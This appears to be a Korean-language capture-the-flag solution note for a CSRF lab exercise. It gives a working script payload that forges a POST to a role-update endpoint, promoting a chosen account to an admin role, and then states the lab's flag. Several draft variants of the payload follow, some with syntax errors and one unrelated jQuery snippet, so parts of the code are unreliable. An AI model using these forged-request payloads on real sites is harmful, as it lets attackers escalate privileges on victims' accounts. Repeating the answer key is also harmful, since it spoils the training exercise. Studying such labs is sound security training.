==================================
* CSRF 문제 2번
==================================
[풀이과정]

1. 공격 구문
<script>const xhr = new XMLHttpRequest(); xhr.open('POST', 'https://lab.eqst.co.kr:8444/csrfpost/update_role_ok_post.jsp', true);xhr.send('target_id=hihihi@hihihi.hihihi&new_role=ADMIN_POST'); </script>

2. 정답
EQST{P05T_m3th0d_15_an5w3r}
==================================








<script>fetch("https://lab.eqst.co.kr:8444/csrfpost/update_role_ok_post.jsp", {method: "POST", headers:'Content-Type':'' body: JSON.stringify({target_id: hihihi@hihihi.hihihi,new_role: ADMIN_POST,}),}).then((response) => response.json());</script>
.then((result) => console.log(result));

.then((response) => console.log("response:", response))


<script>fetch('https://lab.eqst.co.kr:8444/csrfpost/update_role_ok_post.jsp', {method: 'POST',body: JSON.stringify({target_id: 'hihihi@hihihi.hihihi',new_role: 'ADMIN_POST'}),headers: {'Content-type': 'application/x-www-form-urlencoded',},}).then((response) => response.json()).then({(response) => if (response) form.submit();})</script>


<script>$.ajax({type: 'POST'url: 'https://lab.eqst.co.kr:8444/csrfpost/update_role_ok_post.jsp',dataType: 'json',contentType: 'application/x-www-form-urlencoded',data: JSON.stringify({target_id: 'hihihi@hihihi.hihihi',new_role: 'ADMIN_POST'})}).done(function () {});</script>


<script>const xhr = new XMLHttpRequest(); xhr.open('POST','https://lab.eqst.co.kr:8444/csrfpost/update_role_ok_post.jsp',true); xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); xhr.send('target_id=hihihi@hihihi.hihihi&new_role=ADMIN_POST');</script>

<script>const xhr = new XMLHttpRequest(); xhr.open('POST', 'https://lab.eqst.co.kr:8444/csrfpost/update_role_ok_post.jsp', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');xhr.send('target_id=hihihi@hihihi.hihihi&new_role=ADMIN_POST'); </script>




<script>     
    $("#post-all").click(function () {
            $.ajax({
                url: "https://lab.eqst.co.kr:8444/csrfpost/update_role_ok_post.jsp",
                method: "POST",
                data: {
                    name: $("#name").val(),
                    price: $("#price").val() 
                },
                dataType: "text",
                success: function (data) {
                    $('#output').val(data)
                    console.log(data)
            }
        })
    })
</script>
